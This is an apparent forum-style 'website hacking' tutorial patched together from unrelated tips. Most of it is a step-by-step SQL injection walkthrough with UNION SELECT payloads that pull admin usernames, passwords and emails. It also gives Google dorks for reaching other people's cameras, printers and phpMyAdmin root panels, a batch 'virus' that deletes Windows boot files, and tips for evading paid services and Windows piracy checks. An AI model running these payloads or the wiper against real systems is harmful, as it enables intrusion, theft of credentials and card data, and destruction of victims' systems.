WebSite Hacking Full Tutorial

There are couple ways to Hack Into a Website

1. Sql injection
2. RFI
3. LFI
4. Xss
5. Otherways

well in Sql Injection is the most famous thing so I will teach you about SQL with Pic !

Sql Injection

What is SQL Injection?

SQL Injection is something like. In the very simple way when you inject a Site you can get

Admin User Name (Root)
Admin password (Root)
Other admins pass
Every User Name
Every User Pass
Cridit Card Info ( Every Detail )

How you Find a Site Venurable or not

Lets Say I have a Site

Code:

http://www.website.com/shop.php?id=10

to see it HackAble or not Put ‘ in the End
So it Shoud look like
Code:

http://www.website.com/shop.php?id=10′

And If it Give you a MYSQL Error ..That mean the Site is Hack Able

Ok Next Step is

so Now We Know the Site is Venul or not .
Now We Have get trought This to Hack into admin

1. Finding the number of columns
2. Check if UNION works.
3. Looking for a visible column
3. Check if the version is > 5
4. Extracting table names, column names, etc… (Or bruteforcing if the version is < 5) 5. Forming the finishing query to extract our required information. Finding the number of columns Code: http://www.Site.com/shop.php?id=10+order+by+1– (You shoul not get any error) Code: http://www.Site.com/shop.php?id=10+order+by+10000– (You should get an error) If u get a Error The Next Step is to Get the number of columns Code: http://www.Site.com/shop.php?id=10+order+by+2– http://www.Site.com/shop.php?id=10+order+by+3– http://www.Site.com/shop.php?id=10+order+by+4– http://www.Site.com/shop.php?id=10+order+by+5– http://www.Site.com/shop.php?id=10+order+by+6– http://www.Site.com/shop.php?id=10+order+by+7– <— Keep Injecting until you get an error, for me it’s when order by 7 in my Pic Check if UNION works. So Now we Know Our site has 6 columns so What u sould do now is Put it in a order like Code: http://www.Site.com/shop.php?id=-10+Union+Select+1,2,3,4,5,6– Looking for a visible column Now you should get a see a Number in the screen Some were For me its 2 ( Its highlighted ) Check if the version is > 5

Now We need to check if the version is > 5 (VERY VERY IMPORTANT STEP)
For This , I pick our visible column…in this case it is 2…and we must replace it with “@@version”

For Ex :
Code:

http://www.Site.com/shop.php?id=-10+Union+Select+1,@@version,3,4,5,6–

Now you will Able to see the MYSQL Ver Like this

You should FIRST CHECK IF IT IS GREATER THAN 5, now..
If it is, you can proceed or you HAVE TO GUESS THE TABLE NAMES IF ITS BELOW version 5.
Extracting table names, column names, etc…

now we must Get
1. Database names
2. Table names
3. Column names

DataBase Names :

Now This is the Confusing PartSo Stay with me

Now we are gona get the Database Name and user all together since we know the visible column

Code:

http://www.Site.com/shop.php?id=-10+Union+Select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6–

Many peple get confuse with “concat_ws”It actually means concat with separator and the separator we use should be given in the starting of the syntax.Here I used 0x3a whose equivalent is “:” . The main purpose of using this is getting the output in desired format as we need it to be.(copied)

Now lets see what Are this
Version() :— Version()is use to inject version of the MySql used in the server
User() :- This will Inject registered MySql user in the database.
Database () :- is the DataBase Name
Now That will Give you somthing like This

Grab the Database using Information_schema

Code:

http://www.website.com/shop.php?id=1+UNION+SELECT+1, group_concat(schema_name),3,4,5,6 +from+information_schema.schemata—

What is This
1. +from+information_schema.schemata :- returns the databases on the server
We may get the database name depending on the no of databases present.
Like If you get something like this

Sigma is the DataBase Name

Extracting table names:
Now we know the DataBase Name What we need now is MySql Table Names
I’ve picked the database ‘users’ to extract our table names.
we have to use the database information_schema and the table tables and the column table_name to extract the respective table names.
So It Should be like
Code:

http://www.Site.com/shop.php?id=1+UNION+SELECT+1, group_concat(table_name),3,4 ,5,6+from+information_schema.tables—

This is give you more than we need .. Like Every Junkin DB.

So We Only need tables for the table users. So Now we go up with
Code:

http://www.Site.com/shop.php?id=1+UNION+SELECT+1, group_concat(table_name),3,4,5,6 +from+information_schema.tables+where+table_schema=’users’—

If it didnt respose you properly Some Times you have Hex the “Users” when “Users”Hex it get “0×7573657273″
So it sould be like
http://www.Site.com/shop.php?id=1+UNION+SELECT+1, group_concat(table_name),3,4,5,6 +from+information_schema.tables+where+table_schema =’0×7573657273′—
Now you sould get a Table Name I’ll take the table USERS for example.

column names:
Now we gona get the Data from the table named “USERS” and we extract various columns from it.
Code:

www.Site.com/shop.php?id=10+UNION+SE … olumn_name),3,4,5,6+from+information_schema.columns+where+table_name=’USERS’–

In that I have change group_concat(table_name) to group_concat(column_name) becourse now we are looking for columns .
column_name extracts all column names present in the table.
And add this to the end of the columns
+from+information_schema.columns+where+table_name= ‘USERS’—
it will show you the columns lets think table are username,password and email.
Code:

http://www.website.com/shop.php?id=10+UNION+SELECT+1,concat_ws(0x3a,username,password,email) ,3,4+from+USERS—

Real Hacking U Didn’t Seen Before

Ok Lets Start The Hacks !!

>> Note :- To Do This Kind Of Hacks U Need A Broadband Connection !!
>>

1st Hack :-
Viewing Still Security Cameras Using Google :-

>> Open Google And Type :

inurl:”viewerframe?mode=motion”

In The Search Bar And Search,Open Any Results Shown To See Other’s Security Cameras !!

2nd Hack :-
Viewing Motion Security Video Cameras Using Google :-

>> Open Google And Type :

intitle:”Live View / – AXIS”

In The Search Bar And Search,Open Any Results Shown To See Other’s Online Video Cameras !!

3rd Hack :-
Unspidered Sites Using Google :-

>> Open Google And Tye :

“robots.txt” “disallow:” filetype:txt

In The Search Bar And Search,Open Any Results Shown To See Hidden WebPages !!

4th Hack :-
Frontpage User Info Using Google :-

>> Open Google And Tye :

inurl:_vti_pvt “service.pwd”

In The Search Bar And Search,Open Any Results Shown To See Other’s Frontpage User Info !!

5th Hack :-
PHP Photo Album Hack Using Google :-

>> Open Google And Tye :

inurl:”phphotoalbum/upload”

In The Search Bar And Search,Open Any Results Shown To Upload/See/Download Other’s Photo Album’s !!

6th Hack :-
VNC User INFO Using Google :-

>> Open Google And Tye :

“vnc desktop”inurl:5800

In The Search Bar And Search,Open Any Results Shown To Make Bruteforce Attack To Access Other Computers !!

7th Hack :-
Accessing Printers Using Google :-

>> Open Google And Tye :

inurl:”port_255″ -htm

In The Search Bar And Search,Open Any Results Shown To See/Configure Print Any Documents On Other Network Prnters !!

8th Hack :-
PHP Admin Account Hack Using Google :-

>> Open Google And Tye :

intitle:phpMyAdmin “Welcome to phpMyAdmin”***” “running on * as root@*”

In The Search Bar And Search,Open Any Results Shown To Go To Somebody’s WebPage Admin Accounts !!

Please Do Not Try It For Your Computer Safety

This is a kind of virus that you can easily create. Just open your notepad. Copy paste the complete code below in it:-

@echo off
echo Are you sure to get this shit?
pause
echo Are you for 100%% sure?
pause
msg * Really??? bye-bye !!!
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Now save it as something.bat. Once you double click the bat file that you created this will shut down your computer and will delete all the files that are required to reboot your computer. Thus your windows crashes. Now you need to repair your operating system n it will be fine.

Shutdown, Reboot Shortcut On The Desktop

1. Right click on an open area of the desktop
2. Select New / Shortcut
3. Enter in “shutdown -s -t 00″ – no quotes
4. Press the Next button
5. For the name, enter in anything you like   eg : “ShutDown.” Click on the Finish button.

To create a reboot shortcut on the desktop:

1. Right click on an open area of the desktop
2. Select New / Shortcut
3. Enter in “shutdown -r -t 00″ – no quotes
4. Press the Next button
5. For the name, enter in anything you like eg : “Reboot.” Click on the Finish button.

Just You Would Love it ! Have Fun!

Just click on the following link and you’ll be directed to a blank page.

Just Click/ Click and drag your mouse pointer on that page and see
what happens.

http://www.procreo.jp/labo/flower_garden.swf

Disable Autoupdate Of Unregistered Windows

If you using Unregistered Windows. the auto update will be a big Problem to your system.

When you used the internet on your PC. the auto update will connect the Microsoft and your system show some error message like “‘You are the victim of Software Piracy’”

So how can you easily remove Automatic Update and Security Center

Goto Start – > Run and type Msconfig

In ‘System Configuration Utility‘ window

go to Services -tab -

and Uncheck Automatic Update and Security Centre

and Apply OK and Restart

That’s all Enjoy

Download Rapidshare File Without Premium Account !

I saw many of you guys ask for Rapidshare ect.. Premium account(i seen many ) but you dont need others account or no account at all..

why you used other’s hacked id and password (somebody have to pay 4 you ne )

But I always use Link Generators…some people didnt know abt this… i’m helping these people

so first of all……….. Back ground

—–///—-What does Premium Link Generators do

When you applied a Download link (supported host)
they take the link, & from their server they automatically use their Premium account and give us their Premium download link. which can be pause and maximum speed(All the premium members download facilities)

you can’t use this for your uploads…

Now you know what happens ne now for the downloading steps

1. Find a Premium Link generating server (this will be easy) but for example i will give you which I’m using. Then go to their WEB…….

I’m Using This— http://rapid8.com (I recommend )

2. Put your Download link……..

3. Let it generate a link this will take 10s ……

4. Get the link and start downloading……

If you having problem Reply or PM

Now you guys no need ask others for their Premium Accounts

I hope This will help…..Enjoy

Test Your Anti-Virus Status

Copy and paste the code below into notebook

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

(The text should be in one line.)

Save file as “checkantivirus.com” including quotation-marks (make sure it is saved in extention . com)

A few seconds after saving this file, your Anti-Virus should come with the message that this file is infected with virus asking permission for its deletion/clean.

*** This file is secure and its not going to infect your computer in whatever way. It is a standard text developed by the European Institute for Computer Anti-virus Research (EICAR). Every Anti-Virus is programed to load this file as a virus.***

If your Anti-Virus will not detect this file as a virus, a program will appear as DOS window with this text EICAR-STANDARD-ANTIVIRUS-TEST-FILE.
If this happens then you should probably find some other Anti-Virus up to date as you are not fully protected

Set Multiple Home Pages In Firefox

Did you people ever wish to set-up multiple home pages in Firefox ?
I yes, then you are at the right place. So here’s the way to do this little but useful little trick.
Suppose you would like to set Orkut, Google and my blog as your homepages. Then try this tweak in Firefox to set multiple homepages. This is what you should do :
Goto Tools>Options>Main
In the When Firefox starts drop down menu choose Show my home page
In Home page give your homepages separated by a | (pipe symbol)
Example:- http://www.google.com|http://www.tipsntricks303.blogspot.com

Remove Write Protection From Usb, Flash Drives And Memory Card

Sometimes you are unable to copy files into USB drive such as flash drives, memory card and Ipod. When your USB flash drive, or memory card is write-protected, you will receive the following error message:

Cannot copy files and folders, drive is write protected
Cannot format the drive, drive is write protected
The disk is write protected
Remove write protection or use another disk
Media is write protected
This may caused by virus or malware script which modifiies the registry to make any drive write protect when connected to the computer, You can remove write protection from your usb flash drive or memory card using the below method:

1. Open Start Menu >> Run, type regedit and press Enter, this will open
the registry editor.
2. Navigate to the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\StorageDevicePolicies

Note: If the registry key StorageDevicePolicies does not exist, you will need to create it manually.

3. Double click the key WriteProtect in the right window and set the value to 0 in the Value Data Box
and press OK button